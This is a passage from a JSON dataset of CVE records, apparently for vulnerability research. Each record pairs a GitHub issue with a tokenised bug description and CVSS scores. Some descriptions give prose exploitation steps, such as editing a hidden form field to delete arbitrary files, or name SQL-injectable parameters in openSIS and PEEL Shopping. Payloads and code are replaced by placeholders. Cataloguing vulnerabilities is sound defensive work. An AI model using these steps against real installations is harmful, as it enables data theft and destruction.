  72033. "exploitabilityScore": 1.8
  72034. },
  72035. {
  72036. "CVE_ID": "CVE-2021-41459",
  72037. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1912",
  72038. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1912",
  72039. "Repo_new": "gpac/gpac",
  72040. "Issue_Created_At": "2021-09-07T16:28:12Z",
  72041. "description": "Stack buffer overflow in APITAG at PATHTAG in nhmldmx_send_sample. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). Step to reproduce NUMBERTAG get latest commit code (GPAC version NUMBERTAG DEV re NUMBERTAG gd NUMBERTAG acad8 master NUMBERTAG compile with enable sanitizer NUMBERTAG run APITAG add APITAG new new.mp4 Env: Ubunut NUMBERTAG clang NUMBERTAG ASAN report ERRORTAG Different from issue NUMBERTAG the overflow memory is related to APITAG parameter. The APITAG para has the same problem, please fix them together. Buggy code at APITAG CODETAG",
  72042. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72043. "severity": "HIGH",
  72044. "baseScore": 7.5,
  72045. "impactScore": 3.6,
  72046. "exploitabilityScore": 3.9
  72047. },
  72048. {
  72049. "CVE_ID": "CVE-2021-4146",
  72050. "Issue_Url_old": "https://github.com/pimcore/pimcore/issues/11024",
  72051. "Issue_Url_new": "https://github.com/pimcore/pimcore/issues/11024",
  72052. "Repo_new": "pimcore/pimcore",
  72053. "Issue_Created_At": "2021-12-15T10:48:42Z",
  72054. "description": "APITAG Pricing Rules Do not allow negative discounts. Expected behavior Not possible to set negative discounts Actual behavior It is possible to set negative discounts for Cart & Product discount actions, then adds it to to total amount. Steps to reproduce NUMBERTAG Login to the application URLTAG NUMBERTAG Navigate to Online shop > Pricing Rules > Voucher Discount > Actions NUMBERTAG Enter Negative amount in Cart Discount and click on save.",
  72055. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
  72056. "severity": "MEDIUM",
  72057. "baseScore": 4.3,
  72058. "impactScore": 1.4,
  72059. "exploitabilityScore": 2.8
  72060. },
  72061. {
  72062. "CVE_ID": "CVE-2021-41461",
  72063. "Issue_Url_old": "https://github.com/concrete5/concrete5-legacy/issues/2006",
  72064. "Issue_Url_new": "https://github.com/concretecms/concrete5-legacy/issues/2006",
  72065. "Repo_new": "concretecms/concrete5-legacy",
  72066. "Issue_Created_At": "2021-09-16T06:01:54Z",
  72067. "description": "FILETAG Where the Issue Occurred The code below displays the user controlled parameter rel , APITAG , and mode in PATHTAG rel in PATHTAG and cID in PATHTAG without sufficient sanitization: URLTAG URLTAG URLTAG URLTAG URLTAG",
  72068. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  72069. "severity": "MEDIUM",
  72070. "baseScore": 6.1,
  72071. "impactScore": 2.7,
  72072. "exploitabilityScore": 2.8
  72073. },
  72074. {
  72075. "CVE_ID": "CVE-2021-41467",
  72076. "Issue_Url_old": "https://github.com/hjue/JustWriting/issues/106",
  72077. "Issue_Url_new": "https://github.com/hjue/justwriting/issues/106",
  72078. "Repo_new": "hjue/justwriting",
  72079. "Issue_Created_At": "2021-09-17T06:50:17Z",
  72080. "description": "APITAG XSS in PATHTAG Describe the bug/issue Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. Note that these multiple XSS vulnerabilities exist in the APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to the following link: URLTAG NUMBERTAG Boom! Where the vulnerability occurred? The code below displays the user controlled parameter challenge in PATHTAG with incorrect sanitization: URLTAG",
  72081. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  72082. "severity": "MEDIUM",
  72083. "baseScore": 6.1,
  72084. "impactScore": 2.7,
  72085. "exploitabilityScore": 2.8
  72086. },
  72087. {
  72088. "CVE_ID": "CVE-2021-41490",
  72089. "Issue_Url_old": "https://github.com/ompl/ompl/issues/833",
  72090. "Issue_Url_new": "https://github.com/ompl/ompl/issues/833",
  72091. "Repo_new": "ompl/ompl",
  72092. "Issue_Created_At": "2021-09-18T06:09:08Z",
  72093. "description": "Memory leaks in APITAG Here are some outputs NUMBERTAG f5dbf NUMBERTAG in operator new(unsigned long) ( PATHTAG NUMBERTAG f5dbe NUMBERTAG b NUMBERTAG in APITAG const PATHTAG NUMBERTAG f5dbe3d NUMBERTAG in APITAG const ) const PATHTAG NUMBERTAG f5dbe NUMBERTAG in APITAG const ) const PATHTAG NUMBERTAG f5dbe NUMBERTAG in APITAG const&) PATHTAG After our analysis, this crash comes from APITAG In line PATHTAG of APITAG they can apply for memory space. At the same time, the APITAG function can release the memory. However, during our testing, the program will still run to APITAG PATHTAG (application meomory space) after the last call of APITAG so the memory space is not completely released and causing memory leaks.",
  72094. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72095. "severity": "HIGH",
  72096. "baseScore": 7.5,
  72097. "impactScore": 3.6,
  72098. "exploitabilityScore": 3.9
  72099. },
  72100. {
  72101. "CVE_ID": "CVE-2021-41495",
  72102. "Issue_Url_old": "https://github.com/numpy/numpy/issues/19038",
  72103. "Issue_Url_new": "https://github.com/numpy/numpy/issues/19038",
  72104. "Repo_new": "numpy/numpy",
  72105. "Issue_Created_At": "2021-05-19T06:21:52Z",
  72106. "description": "Missing return value validation of the function APITAG APITAG Reproducing code example: The definition of APITAG CODETAG Call site example for APITAG CODETAG Error message: At most call sites for APITAG there are no validations of its return, but an invalid address may be returned. FILETAG APITAG version information: the main branch",
  72107. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  72108. "severity": "MEDIUM",
  72109. "baseScore": 5.3,
  72110. "impactScore": 3.6,
  72111. "exploitabilityScore": 1.6
  72112. },
  72113. {
  72114. "CVE_ID": "CVE-2021-41496",
  72115. "Issue_Url_old": "https://github.com/numpy/numpy/issues/19000",
  72116. "Issue_Url_new": "https://github.com/numpy/numpy/issues/19000",
  72117. "Repo_new": "numpy/numpy",
  72118. "Issue_Created_At": "2021-05-13T04:05:51Z",
  72119. "description": "Potential buffer overflow from string operations in function array_from_pyobj of fortranobject.c. APITAG Reproducing code example: Snippet : ERRORTAG Error message: File : PATHTAG Function : array_from_pyobj (line NUMBERTAG Optional call path : External > fortran_setattr > array_from_pyobj Details in FILETAG When we run our analysis tool on APITAG a few Inappropriate string operations are reported at call sites of function strcpy, sprintf, and strcat in array_from_pyobj. There are no boundary checks at these points despite \"mess\" seems large enough to ensure the operations safe except for the point shown above. As a suggestion, it is better to replace these functions with strncpy, strncat, and snprintf. APITAG version information: the main branch of APITAG",
  72120. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  72121. "severity": "MEDIUM",
  72122. "baseScore": 5.5,
  72123. "impactScore": 3.6,
  72124. "exploitabilityScore": 1.8
  72125. },
  72126. {
  72127. "CVE_ID": "CVE-2021-41497",
  72128. "Issue_Url_old": "https://github.com/RaRe-Technologies/bounter/issues/47",
  72129. "Issue_Url_new": "https://github.com/rare-technologies/bounter/issues/47",
  72130. "Repo_new": "rare-technologies/bounter",
  72131. "Issue_Created_At": "2021-05-14T08:12:08Z",
  72132. "description": "Potential buffer overflow in APITAG of hill.c. APITAG APITAG Description Write to \"self >registers FILETAG PATHTAG to Reproduce ERRORTAG Optional call path : increment > APITAG > APITAG > APITAG Expected Results Return after APITAG Actual Results No return Versions the main branch APITAG",
  72133. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72134. "severity": "HIGH",
  72135. "baseScore": 7.5,
  72136. "impactScore": 3.6,
  72137. "exploitabilityScore": 3.9
  72138. },
  72139. {
  72140. "CVE_ID": "CVE-2021-41498",
  72141. "Issue_Url_old": "https://github.com/belangeo/pyo/issues/221",
  72142. "Issue_Url_new": "https://github.com/belangeo/pyo/issues/221",
  72143. "Repo_new": "belangeo/pyo",
  72144. "Issue_Created_At": "2021-05-27T06:00:51Z",
  72145. "description": "Missing a terminator after strncpy in function Server_jack_init, which may cause read overflow. Code snippet CODETAG Description Function : Server_jack_init File : ad_jack.c Call path : boot APITAG > Server_boot > Server_jack_init APITAG : read overflow. Our analysis tool reported a warning at the call site of strncpy. As client_name is not initialized, it may has no terminator after strncpy hence to cases read overflow. Also seen in FILETAG",
  72146. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72147. "severity": "HIGH",
  72148. "baseScore": 7.5,
  72149. "impactScore": 3.6,
  72150. "exploitabilityScore": 3.9
  72151. },
  72152. {
  72153. "CVE_ID": "CVE-2021-41499",
  72154. "Issue_Url_old": "https://github.com/belangeo/pyo/issues/222",
  72155. "Issue_Url_new": "https://github.com/belangeo/pyo/issues/222",
  72156. "Repo_new": "belangeo/pyo",
  72157. "Issue_Created_At": "2021-05-27T06:14:03Z",
  72158. "description": "Insecure function vsprintf may cause write overflow in function Server_debug. Code snippet ERRORTAG Description Function : Server_debug File : servermodule.c Call path : recstart APITAG > Server_start_rec > Server_start_rec_internal > Server_debug APITAG : Write overflow. Our analysis tool reported a warning at vsprintf in Server_debug. As buffer is a fixed size stack variable, when the debug mode is open, vsprintf may cause write overflow with no boundary check especially when the inputs depended on external modules (e.g., Python). Also seen in FILETAG",
  72159. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72160. "severity": "HIGH",
  72161. "baseScore": 7.5,
  72162. "impactScore": 3.6,
  72163. "exploitabilityScore": 3.9
  72164. },
  72165. {
  72166. "CVE_ID": "CVE-2021-41500",
  72167. "Issue_Url_old": "https://github.com/cvxopt/cvxopt/issues/193",
  72168. "Issue_Url_new": "https://github.com/cvxopt/cvxopt/issues/193",
  72169. "Repo_new": "cvxopt/cvxopt",
  72170. "Issue_Created_At": "2021-05-27T07:26:26Z",
  72171. "description": "Incomplete comparison with function strncmp. Code snippet CODETAG Description Function : PATHTAG Call path NUMBERTAG solve APITAG > solve > strncmp NUMBERTAG spsolve APITAG > spsolve > strncmp NUMBERTAG APITAG > diag > strncmp NUMBERTAG APITAG > getfactor > strncmp APITAG : Incomplete comparison. Out analysis tool reported four warnings about the incomplete comparison of strings as shown above. When the comparison length is NUMBERTAG the terminator would be ignored. Hence even the strncmp returns NUMBERTAG the reality may not match expectations specifically when variable descr depends on external inputs APITAG For example, descr = \"CHOLMOD APITAG the comparison still return NUMBERTAG Also seen in FILETAG , FILETAG , FILETAG and FILETAG",
  72172. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72173. "severity": "HIGH",
  72174. "baseScore": 7.5,
  72175. "impactScore": 3.6,
  72176. "exploitabilityScore": 3.9
  72177. },
  72178. {
  72179. "CVE_ID": "CVE-2021-41502",
  72180. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/885",
  72181. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/885",
  72182. "Repo_new": "intelliants/subrion",
  72183. "Issue_Created_At": "2021-09-19T07:45:36Z",
  72184. "description": "FILETAG no: FILETAG detailed steps: After publishing a blog with uploaded pictures, click APITAG Blog Entry\" to enter the modification page, open Burp Suit and then directly click \"save\", modify the content of image FILETAG Any member browses the blog page: FILETAG",
  72185. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  72186. "severity": "MEDIUM",
  72187. "baseScore": 5.4,
  72188. "impactScore": 2.7,
  72189. "exploitabilityScore": 2.3
  72190. },
  72191. {
  72192. "CVE_ID": "CVE-2021-4156",
  72193. "Issue_Url_old": "https://github.com/libsndfile/libsndfile/issues/731",
  72194. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/731",
  72195. "Repo_new": "libsndfile/libsndfile",
  72196. "Issue_Created_At": "2021-04-13T15:59:19Z",
  72197. "description": "Heap buffer overflow in APITAG in flac_buffer_copy. Hi, I found a vulnerability in current master NUMBERTAG bd NUMBERTAG b URLTAG . There is a heap buffer overflow in APITAG in flac_buffer_copy. The vulnerability can lead to heap based buffer overflow via a crafted sound file, and potentially control heap data by forge buffer content to perform heap exploitation. To reproduce on NUMBERTAG Ubuntu NUMBERTAG with clang NUMBERTAG CODETAG APITAG FILETAG ASAN report: ERRORTAG",
  72198. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H",
  72199. "severity": "HIGH",
  72200. "baseScore": 7.1,
  72201. "impactScore": 4.2,
  72202. "exploitabilityScore": 2.8
  72203. },
  72204. {
  72205. "CVE_ID": "CVE-2021-41581",
  72206. "Issue_Url_old": "https://github.com/libressl-portable/openbsd/issues/126",
  72207. "Issue_Url_new": "https://github.com/libressl/openbsd/issues/126",
  72208. "Repo_new": "libressl/openbsd",
  72209. "Issue_Created_At": "2021-09-23T14:25:43Z",
  72210. "description": "stack buffer overflow in function APITAG The following program can make APITAG : ERRORTAG Here is the asan report: ERRORTAG This is because the buffer working is full of data thus is not ended with APITAG , and the call of strdup can crash the program. In the function APITAG of APITAG , the variable wi means the bytes have been written in buffer work \uff0cif wi is greater than or equal to APITAG , the parse should be stopped because the last byte should be APITAG . The following patch can fix this problem: CODETAG",
  72211. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  72212. "severity": "MEDIUM",
  72213. "baseScore": 5.5,
  72214. "impactScore": 3.6,
  72215. "exploitabilityScore": 1.8
  72216. },
  72217. {
  72218. "CVE_ID": "CVE-2021-41641",
  72219. "Issue_Url_old": "https://github.com/denoland/deno/issues/12152",
  72220. "Issue_Url_new": "https://github.com/denoland/deno/issues/12152",
  72221. "Repo_new": "denoland/deno",
  72222. "Issue_Created_At": "2021-09-20T12:46:38Z",
  72223. "description": "APITAG Deno Sandbox Escape. The Deno file sandbox does not handle symbolic links correctly. When running Deno with specific write access the APITAG method can be used to gain access to any directory. Proof of concept: URLTAG",
  72224. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
  72225. "severity": "HIGH",
  72226. "baseScore": 8.4,
  72227. "impactScore": 5.8,
  72228. "exploitabilityScore": 2.0
  72229. },
  72230. {
  72231. "CVE_ID": "CVE-2021-41652",
  72232. "Issue_Url_old": "https://github.com/sruupl/batflat/issues/113",
  72233. "Issue_Url_new": "https://github.com/sruupl/batflat/issues/113",
  72234. "Repo_new": "sruupl/batflat",
  72235. "Issue_Created_At": "2021-09-20T16:54:46Z",
  72236. "description": "Insecure permissions for APITAG The whole database can be easily dumped with a single http request URLTAG",
  72237. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  72238. "severity": "HIGH",
  72239. "baseScore": 7.5,
  72240. "impactScore": 3.6,
  72241. "exploitabilityScore": 3.9
  72242. },
  72243. {
  72244. "CVE_ID": "CVE-2021-41663",
  72245. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/41",
  72246. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/41",
  72247. "Repo_new": "bg5sbk/minicms",
  72248. "Issue_Created_At": "2021-09-21T10:09:19Z",
  72249. "description": "An xss vulnerability was found where my article was posted. FILETAG FILETAG",
  72250. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  72251. "severity": "MEDIUM",
  72252. "baseScore": 6.1,
  72253. "impactScore": 2.7,
  72254. "exploitabilityScore": 2.8
  72255. },
  72256. {
  72257. "CVE_ID": "CVE-2021-41672",
  72258. "Issue_Url_old": "https://github.com/advisto/peel-shopping/issues/5",
  72259. "Issue_Url_new": "https://github.com/advisto/peel-shopping/issues/5",
  72260. "Repo_new": "advisto/peel-shopping",
  72261. "Issue_Created_At": "2022-06-12T17:25:24Z",
  72262. "description": "SQL Injection in APITAG id_utilisateur POST parameter APITAG Product Version NUMBERTAG Author : Frentzen CVE Assigned : CVETAG Vulnerability Description : Authenticated user (with some administrator pivileges) can inject malicious query in order to achive SQL injection via \"id_utilisateur\" POST parameter on the PATHTAG endpoint. After this attack, attacker can read sensitive information from the database and until modify its data. Vulnerable URL: FILETAG Proof of Concept: FILETAG FILETAG",
  72263. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
  72264. "severity": "MEDIUM",
  72265. "baseScore": 6.5,
  72266. "impactScore": 5.2,
  72267. "exploitabilityScore": 1.2
  72268. },
  72269. {
  72270. "CVE_ID": "CVE-2021-41677",
  72271. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/202",
  72272. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/202",
  72273. "Repo_new": "os4ed/opensis-classic",
  72274. "Issue_Created_At": "2021-09-22T07:15:59Z",
  72275. "description": "SQL injection in function FILETAG . A SQL injection vulnerability exists in version NUMBERTAG of APITAG when APITAG or APITAG is used as the application database. An attacker can then issue the SQL command through the PATHTAG Grade= parameter FILETAG POC FILETAG REQUEST CODETAG RESPONSE ERRORTAG",
  72276. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72277. "severity": "CRITICAL",
  72278. "baseScore": 9.8,
  72279. "impactScore": 5.9,
  72280. "exploitabilityScore": 3.9
  72281. },
  72282. {
  72283. "CVE_ID": "CVE-2021-41678",
  72284. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/203",
  72285. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/203",
  72286. "Repo_new": "os4ed/opensis-classic",
  72287. "Issue_Created_At": "2021-09-22T08:17:21Z",
  72288. "description": "SQL injection in function FILETAG . A SQL injection vulnerability exists in version NUMBERTAG of APITAG when APITAG or APITAG is used as the application database. An attacker can then issue the SQL command through the PATHTAG staff FILETAG FILETAG POC FILETAG REQUEST ERRORTAG RESPONSE ERRORTAG SOLUTION Use function APITAG before assign $_REQUEST['staff'] to $value param. CODETAG",
  72289. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72290. "severity": "CRITICAL",
  72291. "baseScore": 9.8,
  72292. "impactScore": 5.9,
  72293. "exploitabilityScore": 3.9
  72294. },
  72295. {
  72296. "CVE_ID": "CVE-2021-41679",
  72297. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/204",
  72298. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/204",
  72299. "Repo_new": "os4ed/opensis-classic",
  72300. "Issue_Created_At": "2021-09-22T08:56:02Z",
  72301. "description": "SQL INJECTION IN FUNCTION FILETAG . A SQL injection vulnerability exists in version NUMBERTAG of APITAG when APITAG or APITAG is used as the application database. An attacker can then issue the SQL command through the PATHTAG period parameter. FILETAG POC: FILETAG REQUEST: GET PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Connection: close Referer: URLTAG Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG RESPONSE: HTTP NUMBERTAG OK Date: Wed NUMBERTAG Sep NUMBERTAG GMT Server: APITAG APITAG Expires: Thu NUMBERTAG No NUMBERTAG GMT Cache Control: no store, no cache, must revalidate Pragma: no cache Vary: Accept Encoding Content Length NUMBERTAG Connection: close Content Type: text/html; charset=UTF NUMBERTAG FILETAG",
  72302. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72303. "severity": "CRITICAL",
  72304. "baseScore": 9.8,
  72305. "impactScore": 5.9,
  72306. "exploitabilityScore": 3.9
  72307. },
  72308. {
  72309. "CVE_ID": "CVE-2021-41682",
  72310. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4747",
  72311. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4747",
  72312. "Repo_new": "jerryscript-project/jerryscript",
  72313. "Issue_Created_At": "2021-08-24T03:35:55Z",
  72314. "description": "heap use after free in APITAG APITAG revision NUMBERTAG bcd NUMBERTAG f Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG",
  72315. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72316. "severity": "HIGH",
  72317. "baseScore": 7.8,
  72318. "impactScore": 5.9,
  72319. "exploitabilityScore": 1.8
  72320. },
  72321. {
  72322. "CVE_ID": "CVE-2021-41683",
  72323. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4745",
  72324. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4745",
  72325. "Repo_new": "jerryscript-project/jerryscript",
  72326. "Issue_Created_At": "2021-08-24T03:27:50Z",
  72327. "description": "stack overflow in ecma_get_lex_env_type. APITAG revision APITAG Build platform APITAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG",
  72328. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72329. "severity": "HIGH",
  72330. "baseScore": 7.8,
  72331. "impactScore": 5.9,
  72332. "exploitabilityScore": 1.8
  72333. },
  72334. {
  72335. "CVE_ID": "CVE-2021-41715",
  72336. "Issue_Url_old": "https://github.com/libsixel/libsixel/issues/27",
  72337. "Issue_Url_new": "https://github.com/libsixel/libsixel/issues/27",
  72338. "Repo_new": "libsixel/libsixel",
  72339. "Issue_Created_At": "2021-09-14T12:27:12Z",
  72340. "description": "heap use after free in PATHTAG Hi,I found a heap use after free in the current master fb NUMBERTAG URLTAG It sames with the PATHTAG NUMBERTAG URLTAG (I just found the problem.) OS: Ubuntu NUMBERTAG LTS NUMBERTAG Kernel NUMBERTAG generic POC: FILETAG It's the command line's report: ERRORTAG and here is the ASAN report for saitoha/libsixel (the current master NUMBERTAG a5be8b URLTAG : ERRORTAG",
  72341. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72342. "severity": "HIGH",
  72343. "baseScore": 8.8,
  72344. "impactScore": 5.9,
  72345. "exploitabilityScore": 2.8
  72346. },
  72347. {
  72348. "CVE_ID": "CVE-2021-41729",
  72349. "Issue_Url_old": "https://github.com/meiko-S/BaiCloud-cms/issues/3",
  72350. "Issue_Url_new": "https://github.com/meiko-s/baicloud/issues/3",
  72351. "Repo_new": "meiko-s/baicloud",
  72352. "Issue_Created_At": "2021-09-22T04:36:17Z",
  72353. "description": "Bug Report: Multiple Arbitrary File Deletion vulnerabilities. Vulnerability Name: Multiple Arbitrary File Deletion Date of Discovery NUMBERTAG August NUMBERTAG Product version NUMBERTAG Download link Author: hibiki sama Vulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the APITAG function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. Proof of Concept NUMBERTAG ulnerable URL: FILETAG Vulnerable Code: line NUMBERTAG kanacms\\user FILETAG It can be found that there is no verification, just judge whether it is the same as the previous or default, and then use unlink to delete the file as long as the file exists Therefore, the vulnerability analysis and utilization are very simple FILETAG We deleted the installed lock file / install / APITAG FILETAG Proof of Concept NUMBERTAG ulnerable URL: FILETAG Vulnerable Code: line NUMBERTAG PATHTAG There is an arbitrary file deletion vulnerability. I have to say that the system is really problematic in judging this The file causing the problem is in / user / FILETAG It is also a problem caused by the comparison between oldimg and img FILETAG Similar to the above analysis, it only judges whether it is the same as the original, and then splices.. / and directly calls unlink, so the use is also very simple Just delete the hidden of the form attribute in HTML, and then directly enter the file name you want to delete",
  72354. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  72355. "severity": "CRITICAL",
  72356. "baseScore": 9.1,
  72357. "impactScore": 5.2,
  72358. "exploitabilityScore": 3.9
  72359. },
  72360. {
  72361. "CVE_ID": "CVE-2021-41732",
  72362. "Issue_Url_old": "https://github.com/zeek/zeek/issues/1798",
  72363. "Issue_Url_new": "https://github.com/zeek/zeek/issues/1798",
  72364. "Repo_new": "zeek/zeek",
  72365. "Issue_Created_At": "2021-09-24T12:58:26Z",
  72366. "description": "There is a http request splitting vulnerability. By sending a specific HTTP POST request, ZEEK will split a request into multiple and split the wrong fields. This will invalidate any ZEEK HTTP based security APITAG ZEEK's internal security plug ins). POC APITAG Detailed information ZEEK version APITAG start ZEEK CODETAG Send normal request ERRORTAG ZEEK generates NUMBERTAG log The request method is POST, the host is APITAG and the uri is / FILETAG ERRORTAG send poc ERRORTAG ZEEK generates HTTP logs with NUMBERTAG errors The first display request method is POST, host is uri is / FILETAG The second display request method is bc, host is uri is abc The third display request method is POST, the host is APITAG and the uri is / FILETAG Obviously, ZEEK divides an HTTP request into three, and the request method, request host and request URI are misplaced. This will invalidate any ZEEK HTTP based analysis. HTTP request splitting vulnerability exists. ERRORTAG",
  72367. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  72368. "severity": "HIGH",
  72369. "baseScore": 7.5,
  72370. "impactScore": 3.6,
  72371. "exploitabilityScore": 3.9
  72372. },
  72373. {
  72374. "CVE_ID": "CVE-2021-41736",
  72375. "Issue_Url_old": "https://github.com/grame-cncm/faust/issues/653",
  72376. "Issue_Url_new": "https://github.com/grame-cncm/faust/issues/653",
  72377. "Repo_new": "grame-cncm/faust",
  72378. "Issue_Created_At": "2021-09-24T09:33:04Z",
  72379. "description": "Memory corruptions in Faust compiler. I went on with some tests (similarly to NUMBERTAG and I discovered overall NUMBERTAG different vulnerabilities. You can reproduce by compiling with asan enabled. Here I attach a resume of the stacktrace and the crashing inputs. If it is possible, I would like to request for at least some CVEs that I need for a paper. FILETAG Error type : ABRT on unknown address NUMBERTAG e NUMBERTAG fdc (pc NUMBERTAG fe0e NUMBERTAG a9fb7 bp NUMBERTAG dc NUMBERTAG sp NUMBERTAG fe0e0e NUMBERTAG T2) Error location NUMBERTAG ba NUMBERTAG in APITAG , APITAG > >::vector(unsigned long, APITAG > const&) ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : SEGV on unknown address NUMBERTAG pc NUMBERTAG ba NUMBERTAG a bp NUMBERTAG fff NUMBERTAG d NUMBERTAG sp NUMBERTAG fff NUMBERTAG d NUMBERTAG a0 T0) Error location NUMBERTAG ba NUMBERTAG a in ppsig::printui(std::ostream&, APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG ) const ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : SEGV on unknown address NUMBERTAG pc NUMBERTAG aec NUMBERTAG bp NUMBERTAG ffc NUMBERTAG b0 sp NUMBERTAG ffc NUMBERTAG d NUMBERTAG T0) Error location NUMBERTAG aec NUMBERTAG in APITAG , APITAG > > const&) ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : ABRT on unknown address NUMBERTAG e NUMBERTAG fe8 (pc NUMBERTAG fc NUMBERTAG ecfb7 bp NUMBERTAG dc NUMBERTAG sp NUMBERTAG fc NUMBERTAG aa NUMBERTAG T2) Error location NUMBERTAG b NUMBERTAG f NUMBERTAG in APITAG ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : stack overflow on address NUMBERTAG ffec7cfdf NUMBERTAG pc NUMBERTAG d NUMBERTAG bp NUMBERTAG ffec7cfe7b0 sp NUMBERTAG ffec7cfdf NUMBERTAG T0) Error location NUMBERTAG d NUMBERTAG in __interceptor_strcmp ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : heap buffer overflow on address NUMBERTAG cb8 at pc NUMBERTAG b9f8f9 bp NUMBERTAG fe NUMBERTAG fac NUMBERTAG sp NUMBERTAG fe NUMBERTAG fac NUMBERTAG Error location NUMBERTAG b9f8f8 in APITAG , APITAG , APITAG , APITAG , APITAG > > const&) propagate.cpp Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG a bp NUMBERTAG fff5c0e NUMBERTAG d0 sp NUMBERTAG fff5c0e3cc0 T0) Error location NUMBERTAG f NUMBERTAG a in APITAG , APITAG ) ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : SEGV on unknown address NUMBERTAG pc NUMBERTAG ed6b6 bp NUMBERTAG ffd6c0d NUMBERTAG e0 sp NUMBERTAG ffd6c0d NUMBERTAG e0 T0) Error location NUMBERTAG ed6b6 in APITAG , APITAG , APITAG , APITAG , APITAG , APITAG , APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : SEGV on unknown address NUMBERTAG pc NUMBERTAG ba NUMBERTAG bp NUMBERTAG fffc 